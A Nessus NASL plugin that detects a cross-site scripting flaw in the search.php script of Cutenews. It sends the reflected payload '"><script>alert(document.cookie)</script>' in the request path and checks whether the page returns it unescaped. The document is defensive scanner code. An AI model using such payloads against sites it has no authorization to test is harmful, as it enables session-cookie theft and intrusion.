#
#       This script was written by Justin Seitz <jms@bughunter.ca>
#       Per Justin : GPLv2
#


if(description)
{
 # set script identifiers

 script_id(23775);
 script_version("$Revision: 1.3 $");

 script_bugtraq_id(21233);

 name["english"] = "Cutenews search.php Cross-Site Scripting Vulerability";
 summary["english"] = "Tries to inject javascript code.";
 family["english"] = "CGI abuses : XSS";

 script_name(english:name["english"]);
desc["english"] = "
Synopsis :

The remote web server contains a PHP script that is affected by a
cross-site scripting issue. 

Description:

The version of Cutenews installed on the remote host fails to sanitize
input to the 'search.php' script before using it to generate dynamic
HTML to be returned to the user.  An unauthenticated attacker can
exploit this issue to execute a cross-site scripting attack. 

This version of Cutenews is also likely affected by other associated
issues. 

See also :

http://www.kapda.ir/advisory-450.html

Solution :

Unknown at this time. 

Risk factor :

Medium / CVSS Base Score : 4.3
(CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)";
 script_description(english:desc["english"]);
 script_summary(english:summary["english"]);

 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2006 Justin Seitz");

 script_family(english:family["english"]);

 script_dependencie("cutenews_detect.nasl", "cross_site_scripting.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);

#
# verify we can talk to the web server, if not exit
#

if(!get_port_state(port)) exit(0);
if(!can_host_php(port:port)) exit(0);
if (get_kb_item("www/" + port + "/generic_xss")) exit(0);

#
#
#	Test for an install of Cutenews
#
#

install = get_kb_item(string("www/", port, "/cutenews"));
if (isnull(install)) exit(0);

matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
	  dir = matches[2];
	  attackstring = '"><script>alert(document.cookie)</script>';
          attacksploit = urlencode(str:attackstring, unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!~*'()-]/");
	  attackreq = http_get(item:string(dir, "/search.php/", attacksploit), port:port);			
	  attackres = http_keepalive_send_recv(port:port, data:attackreq, bodyonly:TRUE);
	  if(isnull(attackres)) exit(0);

	  if(string('action="', dir, "/search.php/", attackstring, "?subaction=search") >< attackres)
		security_warning(port);
}
